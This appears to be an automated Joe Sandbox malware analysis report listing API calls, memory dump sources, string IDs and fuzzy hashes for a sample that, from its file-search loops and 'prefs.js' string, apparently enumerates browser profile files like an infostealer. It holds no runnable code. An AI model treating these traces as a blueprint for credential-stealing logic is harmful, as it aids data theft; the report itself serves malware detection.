                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
                                                                                                • API String ID: 1125553467-4052298153
                                                                                                • Opcode ID: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                                                                                • Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
                                                                                                • Opcode Fuzzy Hash: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                                                                                • Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: za$H$M$Q{a$ROWID$aggregate$ambiguous column name$excluded$false$main$new$no such column$non-deterministic functions$old$parameters$subqueries$the "." operator$true$window
                                                                                                • API String ID: 0-995943838
                                                                                                • Opcode ID: 33a4bf6f428ee4edd743105bfae109be89976f240395f77ce69a64c47f31ce08
                                                                                                • Instruction ID: 1d323ea87534b4984c39532d96b7a68bc5a2d3eb5612128e3b04e89f7f046be3
                                                                                                • Opcode Fuzzy Hash: 33a4bf6f428ee4edd743105bfae109be89976f240395f77ce69a64c47f31ce08
                                                                                                • Instruction Fuzzy Hash: 9AF25A74A042658FEB20CF68D980B99BBF1BF49308F24C5DAD8999B391D770E985CF50
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                                                                                • wsprintfA.USER32 ref: 004147F6
                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                                                                                • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
                                                                                                • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
                                                                                                • FindClose.KERNEL32(000000FF), ref: 004148F0
                                                                                                • lstrcatA.KERNEL32(?,0096C4E8,?,00000104), ref: 00414915
                                                                                                • lstrcatA.KERNEL32(?,00974900), ref: 00414928
                                                                                                • lstrlenA.KERNEL32(?), ref: 00414935
                                                                                                • lstrlenA.KERNEL32(?), ref: 00414946
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                                • String ID: %s\%s$%s\*
                                                                                                • API String ID: 13328894-2848263008
                                                                                                • Opcode ID: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                                                                                • Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
                                                                                                • Opcode Fuzzy Hash: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                                                                                • Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID: , ?$4$8a$@Da$__langid$_content$bua$bua$bua$compress$content$fts3$rowid$simple$uncompress$va$a
                                                                                                • API String ID: 1294909896-3798220086
                                                                                                • Opcode ID: 04e785ddea65c3160c7319b53b62be90c5ffadaedcfade183d905f9c131a88bc
                                                                                                • Instruction ID: ef7f48c3fdd7dc8ca6414c769173e2ec05d9438d07e734940b1c5d50411cadd4
                                                                                                • Opcode Fuzzy Hash: 04e785ddea65c3160c7319b53b62be90c5ffadaedcfade183d905f9c131a88bc
                                                                                                • Instruction Fuzzy Hash: 40C2B0B49083598FDB10CFA8C58479DBBF1AF88318F2589AED898AB341D774D985CF41
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 0040EE3E
                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
                                                                                                • StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
                                                                                                • StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
                                                                                                • FindClose.KERNEL32(000000FF), ref: 0040F3C3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                • String ID: %s\*.*
                                                                                                • API String ID: 180737720-1013718255
                                                                                                • Opcode ID: 8e810b1e1299696a84cd716ff2cb3521fe6dcebbbb688be2a24adbf32e873b7e
                                                                                                • Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
                                                                                                • Opcode Fuzzy Hash: 8e810b1e1299696a84cd716ff2cb3521fe6dcebbbb688be2a24adbf32e873b7e
                                                                                                • Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: bua$bua$config$content$data$docsize$id INTEGER PRIMARY KEY, block BLOB$id INTEGER PRIMARY KEY, sz BLOB$idx$k PRIMARY KEY, v$rowid$segid, term, pgno, PRIMARY KEY(segid, term)$version
                                                                                                • API String ID: 0-2268357529
                                                                                                • Opcode ID: f0ae7c2a6ac9ca1115cba7e4b0d4d22d6b6e90ba2b269ecf27a188f44c4a7483
                                                                                                • Instruction ID: f9c2f8dafde392a94833a84278d27f7abaf5337b7a20f26a6dc113648fca896e
                                                                                                • Opcode Fuzzy Hash: f0ae7c2a6ac9ca1115cba7e4b0d4d22d6b6e90ba2b269ecf27a188f44c4a7483
                                                                                                • Instruction Fuzzy Hash: FE8206B49046499FDB10CFA9C18079DBBF1BF89318F25C92EE894AB395D774D881CB42
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
                                                                                                • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
                                                                                                • StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
                                                                                                • FindClose.KERNEL32(000000FF), ref: 0040E4F2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                                • String ID: 4@$\*.*
                                                                                                • API String ID: 2325840235-1993203227
                                                                                                • Opcode ID: e02c36ebd5ef7547e0fa1ccff715018f32a25fe0a66858dde4490393c2ac4efe
                                                                                                • Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
                                                                                                • Opcode Fuzzy Hash: e02c36ebd5ef7547e0fa1ccff715018f32a25fe0a66858dde4490393c2ac4efe
                                                                                                • Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
                                                                                                • StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
                                                                                                • StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FBB1
                                                                                                • FindClose.KERNEL32(000000FF), ref: 0040FBC3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                • String ID: prefs.js
                                                                                                • API String ID: 3334442632-3783873740
                                                                                                • Opcode ID: fa7978816ecf7266b691bd054db9c823c8232bfad1804aae5ed7943e4e66fe35
                                                                                                • Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
                                                                                                • Opcode Fuzzy Hash: fa7978816ecf7266b691bd054db9c823c8232bfad1804aae5ed7943e4e66fe35
                                                                                                • Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
                                                                                                • StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
                                                                                                • StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DECC
                                                                                                • FindClose.KERNEL32(000000FF), ref: 0040DEDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3334442632-0
                                                                                                • Opcode ID: 2ff1cb5bcd9e8e085842ff8f0fe9f89c2148c72051bc76be1909f871fd55977c
                                                                                                • Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
                                                                                                • Opcode Fuzzy Hash: 2ff1cb5bcd9e8e085842ff8f0fe9f89c2148c72051bc76be1909f871fd55977c
                                                                                                • Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID: DELETE from$UPDATE$content$docsize$optimize
                                                                                                • API String ID: 1475443563-624765053
                                                                                                • Opcode ID: 8383cfa403177ec0fc50be48f88878691afb5600a2be6e23d8c4aafd1dd02aee
                                                                                                • Instruction ID: 70c6a14bc8af06d6aef6aa9ad5cb9e7fc1cc1a093b7b28355e50790c232760be
                                                                                                • Opcode Fuzzy Hash: 8383cfa403177ec0fc50be48f88878691afb5600a2be6e23d8c4aafd1dd02aee
                                                                                                • Instruction Fuzzy Hash: ABC2F674A042598FDB10DFA8C980B8DBBF1BF88308F2585A9D849AB345D774ED85CF81
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0040C953
                                                                                                • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0096C398), ref: 0040C971
                                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                                                                                • lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                                                                                • lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                                                                                • lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                                • String ID:
                                                                                                • API String ID: 1498829745-0
                                                                                                • Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
